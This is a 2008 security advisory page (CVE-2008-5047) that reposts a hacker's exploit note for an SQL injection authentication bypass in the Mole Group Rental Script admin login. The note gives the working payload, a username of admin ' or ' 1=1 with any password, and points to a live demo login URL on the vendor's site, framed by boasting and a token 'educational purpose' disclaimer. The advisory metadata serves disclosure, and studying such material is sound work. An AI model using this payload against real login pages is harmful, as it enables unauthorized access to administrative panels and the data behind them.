|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home SecurityAlert Database |
|
|
Topic : | Mole Group Rental Script (Auth Bypass) SQL Injection Vuln
|
SecurityAlert : 4580
CVE : CVE-2008-5047
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : Cyber-Zone
Published : 14.11.2008
Affected Software : | mole_group:rental_script |
 Advisory Content :
[!] OO
Proud To Be MoroCCaN
[!]
***************************************************************************
***************************************************************************
*****
+---- Bismi Allah
Irahmani ArraHim
----+
++-------------------------------------------------------------------------
---------------------------------------------------------------------------
----+
++ [ Mole Group Rental Script(Auth
Bypass) SQL Injection Vulnerability ]
++
+--------------------------------------------------------------------------
---------------------------------------------------------------------------
---++
: Author : Cyber-Zone ( Abdelkhalek)
: :
:
¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr
¦ ¦
¦
¦ Home : WwW.IQ-Ty.CoM
¦ ¦ MySQL
Version Is : ¦
¦ From : MoroCCo
¦ ¦
¦
¦ Script : http://www.mole-group.com
¦ ¦ ![
]! ¦
¦ Download : http://www.mole-group.com/content/view/32/46/
¦ ¦
¦
¦ RisK : High
[¦¦¦¦¦¦¦¦]
¦
¦ ¦
¦
---------------------------------------------------------------------------
-----------------------------+
+-------------------------------------- ¦
¦ From The
Dark Side Of MoroCCo
++
+--------------------------------------------------------------------------
---------------------------------------------------------------------------
---++
:
:
¦ Remember :
¦
¦ -------------
¦
¦
¦
¦ This information is only for educational purpose, Cyber-Zone will
not bear responsibility for any damages.
¦
¦
¦
++-------------------------------------------------------------------------
---------------------------------------------------------------------------
----+
++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX
Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an [!]
++
+--------------------------------------------------------------------------
---------------------------------------------------------------------------
---++
Bypass : ........
Go To The Admin Panel.
and Login with this information :
username : admin ' or ' 1=1
password : Cyber-Zone or any thing you want :)
yeah bro you loged in dont worry :)
and this is a live demo :
http://rent.mole-group.com/admin/login.php?in_login=yes&retpage=%2Fadmin%2F
index.php
EnjoY.
+--------------------------------------------------------------------------
---------------------------------------------------------------------------
---++
+----
ThanX To
----+
++-------------------------------------------------------------------------
---------------------------------------------------------------------------
----+
++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr
, $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig
City ]++
+--------------------------------------------------------------------------
---------------------------------------------------------------------------
---++
=
[AttaCk Is CompLet]
References :
http://www.securityfocus.com/bid/32195
http://www.milw0rm.com/exploits/7043
http://secunia.com/advisories/32646
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|